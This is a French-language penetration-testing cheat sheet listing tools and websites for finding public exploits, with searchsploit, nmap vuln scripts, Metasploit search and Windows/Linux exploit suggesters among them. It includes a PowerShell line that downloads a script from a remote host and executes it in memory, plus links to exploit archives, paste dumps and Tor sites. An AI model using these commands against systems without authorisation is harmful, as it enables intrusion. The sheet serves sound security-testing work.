offline :

• un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns
• SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
• → git clone https://github.com/offensive-security/exploit-database.git
• → apt update && apt -y install exploitdb
• → searchsploit -u #update
• → searchsploit “linux Kernel”–exclude=”(PoC)|/dos/” #Example
• → searchsploit apache mod_ssl #Other example
• → searchsploit -m 7618 #Paste the exploit in current directory
• → searchsploit -p 7618[.c] #Show complete path
• → searchsploit -x 7618[.c] #Open vi to inspect the exploit
• → searchsploit –nmap file.xml #Search vulns inside an nmap xml result
• → searchsploit openssh 3 –color| grep -i 'openssh 3.' #This example filter the result
• → nmap –min-rate 200 -p- 10.10.10.93 -oX resultat.xml
• → searchsploit -x –nmap resultat.xml

• MSF-Search
• → msf> search platform:windows port:135 target:XP type:exploit

• Nmap vulners
• → nmap –script nmap-vulners -sV 127.0.0.1 -p 443

• Nmap vuln
• → nmap -Pn -n -sV -oN vulnnmapoutput.txt –script vuln 127.0.0.1

• Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
• → https://github.com/rasta-mouse/Sherlock
• → powershell “IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns”
• → attend quelque minutes

• Windows Exploit Suggester
• → git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• → pip install xlrd –upgrade
• → apt install python3-xlrd
• → ./windows-exploit-suggester.py –update
• → python windows-exploit-suggester.py –database 2020-07-27-mssb.xls –systeminfo sysinfo.txt

• Windows Exploit Suggester - Next Generation (WES-NG)
• → git clone https://github.com/bitsadmin/wesng.git
• → python wes.py –update
• → python wes.py sysinfoTarget.txt
• List only vulnerabilities with exploits, excluding IE, Edge and Flash
• → wes.py systeminfo.txt –exploits-only –hide “Internet Explorer” Edge Flash
• → wes.py systeminfo.txt -e –hide “Internet Explorer” Edge Flash
• Only show vulnerabilities of a certain impact
• → wes.py systeminfo.txt - -impact “Remote Code Execution”
• → wes.py systeminfo.txt -i “Remote Code Execution”
• → wes.py systeminfo.txt -i “Elevation of Privilege”
• Only show vulnerabilities of a certain severity
• → wes.py systeminfo.txt –severity critical important
• → wes.py systeminfo.txt -s critical

• Linux Exploit Suggester 2
• → git clone https://github.com/jondonas/linux-exploit-suggester-2

• LES: Linux privilege escalation auditing tool
• → git clone https://github.com/mzet-/linux-exploit-suggester

online :

• https://cn-sec.com/?s=CVE
• https://snyk.io/vuln
• http://www.securityfocus.com/
• https://www.cvedetails.com/
• https://www.exploit-db.com/
• https://www.exploit-db.com/google-hacking-database/
• google
• → firefox –search “Microsoft Edge site:exploit-db.com”
• → firefox –search “Microsoft Edge site:exploit-db.com” inurl:exploits intext:remote intitle:Browser
• https://srcincite.io/exploits/
• https://www.exploitalert.com/
• https://github.com/qazbnm456/awesome-cve-poc
• https://github.com/yeahhub/awesome-cve-poc
• https://vulners.com/
• https://sploitus.com/
• → https://github.com/rejoinder/sploitus-search
• → https://github.com/0xricksanchez/sploitGET
• → https://github.com/si9int/sploitus.py
• https://www.github.com/
• pastebin.com
• → http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html
• → https://pastebeen.com
• → https://psbdmp.cc/ https://psbdmp.ws/
• Tor
• → http://xmh57jrzrnw6insl.onion/
• → http://hss3uro2hsxfogfq.onion/
• → http://gjobqjj7wyczbqie.onion/
• → https://ahmia.fi/
• https://threatpost.com/
• https://www.deepdotweb.com/
• https://packetstormsecurity.com/
• http://routerpwn.com/
• https://www.rapid7.com/db/
• http://0day.today/ non recommandé thread sur le forum
• https://cve.mitre.org/cve/
• http://www.exploitalert.com
• http://www.vulnerability-lab.com
• https://www.rapid7.com/db/
• http://it.0day.today
• https://nvd.nist.gov
• http://osvdb.org
• https://cxsecurity.com
• https://www.kb.cert.org/vuls
• https://secunia.com/community/advisories/search/
• http://lwn.net/Vulnerabilities/
• https://www.owasp.org/index.php/Category:Vulnerability
• http://xforce.iss.net
• http://www.us-cert.gov/cas/techalerts/
• http://www.securiteam.com
• http://lab.mediaservice.net
• http://www.intelligentexploit.com
• http://osvdb.org/
• https://wpvulndb.com/
• http://repwn.com/wiki.html
• https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.
• https://cveapi.com/ cveapi - free API for CVE data.
• http://securityvulns.com/
• http://insecure.org/sploits_all.html
• http://zerodayinitiative.com/advisories/published/
• http://nmrc.org/pub/index.html
• http://oval.mitre.org
• https://github.com/qazbnm456/awesome-cve-poc
• https://github.com/pwnwiki/pwnwiki.github.io/
• https://0dayfans.com/
• https://www.seebug.org/

Finding more information regarding the exploit

• http://www.cvedetails.com
• http://packetstormsecurity.org/files/cve/[CVE]
• http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
• http://www.vulnview.com/cve-details.php?cvename=[CVE]